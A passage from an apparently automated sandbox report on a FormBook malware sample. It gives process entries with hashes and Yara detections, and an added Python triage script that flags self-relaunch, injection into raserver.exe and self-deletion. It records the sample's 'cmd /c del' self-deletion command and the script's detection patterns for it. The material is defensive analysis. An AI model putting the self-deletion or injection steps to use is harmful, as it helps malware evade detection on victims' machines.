                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:18:04:33
                                                                      Start date:22/07/2021
                                                                      Path:C:\Users\user\Desktop\pMbPS8nCm1.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\pMbPS8nCm1.exe'
                                                                      Imagebase:0x400000
                                                                      File size:177067 bytes
                                                                      MD5 hash:DE87F1794377537DDA721AFD9137E491
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:18:04:38
                                                                      Start date:22/07/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                      Imagebase:0x7ff693d90000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:18:05:00
                                                                      Start date:22/07/2021
                                                                      Path:C:\Windows\SysWOW64\raserver.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                      Imagebase:0xeb0000
                                                                      File size:108544 bytes
                                                                      MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:18:05:05
                                                                      Start date:22/07/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
                                                                      Imagebase:0x150000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:18:05:05
                                                                      Start date:22/07/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7ecfc0000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
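Read together, the six process entries above give the sequence a triage analyst cares about: the sample starts a second copy of itself with an identical command line one second later, raserver.exe (a Windows binary under SysWOW64, started with no arguments) is the process whose memory carries the FormBook Yara hits, and cmd.exe is then run with "/c del" against the original sample path. The Python below is an added example, not part of the report, that parses these key:value blocks and applies those three rules. The block text is copied from the entries above, trimmed to the fields the rules read; the 5-second relaunch window and the rule names are assumptions made for the example.

```python
import re
from collections import defaultdict

# Sample input: the six "General" process blocks above, trimmed to Start time,
# Path, Commandline and the Yara rule lines the rules below read. Copied from
# the report for this added example.
REPORT_TEXT = r"""
General
Start time:18:04:32
Path:C:\Users\user\Desktop\pMbPS8nCm1.exe
Commandline:'C:\Users\user\Desktop\pMbPS8nCm1.exe'
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, Author: Joe Security
General
Start time:18:04:33
Path:C:\Users\user\Desktop\pMbPS8nCm1.exe
Commandline:'C:\Users\user\Desktop\pMbPS8nCm1.exe'
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
General
Start time:18:04:38
Path:C:\Windows\explorer.exe
Commandline:C:\Windows\Explorer.EXE
General
Start time:18:05:00
Path:C:\Windows\SysWOW64\raserver.exe
Commandline:C:\Windows\SysWOW64\raserver.exe
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
General
Start time:18:05:05
Path:C:\Windows\SysWOW64\cmd.exe
Commandline:/c del 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
General
Start time:18:05:05
Path:C:\Windows\System32\conhost.exe
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
"""


def parse_process_blocks(text):
    """Parse the report's key:value process blocks into one dict per process."""
    procs, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if line == "General":
            cur = {"yara": []}
            procs.append(cur)
        elif cur is None or not line:
            continue
        elif line.startswith("• Rule:"):
            cur["yara"].append(line[len("• Rule:"):].split(",")[0].strip())
        else:
            key, _, value = line.partition(":")   # split on the first colon only
            cur[key.strip()] = value.strip()
    return procs


def to_seconds(hhmmss):
    h, m, s = (int(x) for x in hhmmss.split(":"))
    return h * 3600 + m * 60 + s


DEL_TARGET = re.compile(r"/c\s+del\s+['\"]?([^'\"]+)", re.IGNORECASE)


def triage(procs, relaunch_window=5):
    """Apply three rules to the process list; returns (rule, path, detail) tuples."""
    findings = []
    images = {p["Path"].lower() for p in procs}
    for p in procs:
        path, cmd = p["Path"], p.get("Commandline", "")
        # Rule 1: cmd.exe deleting an image that itself ran in this trace (self-removal).
        m = DEL_TARGET.search(cmd)
        if path.lower().endswith("\\cmd.exe") and m and m.group(1).strip().lower() in images:
            findings.append(("self-delete", path, m.group(1).strip()))
        # Rule 2: a Windows system binary whose memory matches malware Yara rules is an
        # injected host process, not the dropper; that is where the payload lives.
        if path.lower().startswith("c:\\windows\\") and p["yara"]:
            findings.append(("injected-host", path, ", ".join(sorted(set(p["yara"])))))
    # Rule 3: the same image started twice with the same command line within a few
    # seconds is the usual shape of a sample launching a copy of itself to hollow.
    starts = defaultdict(list)
    for p in procs:
        starts[(p["Path"], p.get("Commandline", ""))].append(to_seconds(p["Start time"]))
    for (path, _), times in starts.items():
        times.sort()
        if len(times) > 1 and times[1] - times[0] <= relaunch_window:
            findings.append(("relaunch-self", path, f"{len(times)} starts within {times[-1] - times[0]}s"))
    return findings


if __name__ == "__main__":
    for rule, path, detail in triage(parse_process_blocks(REPORT_TEXT)):
        print(f"{rule:14} {path}  ({detail})")
```

Rule 2 keys on Yara hits rather than on parent-child relationships because this section of the report records no parent for raserver.exe; the memory match is the evidence the page actually provides. Rule 1 resolves the deleted path against the set of images that ran, so a generic cleanup of an unrelated file is not reported.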

                                                                      Disassembly

                                                                      Code Analysis
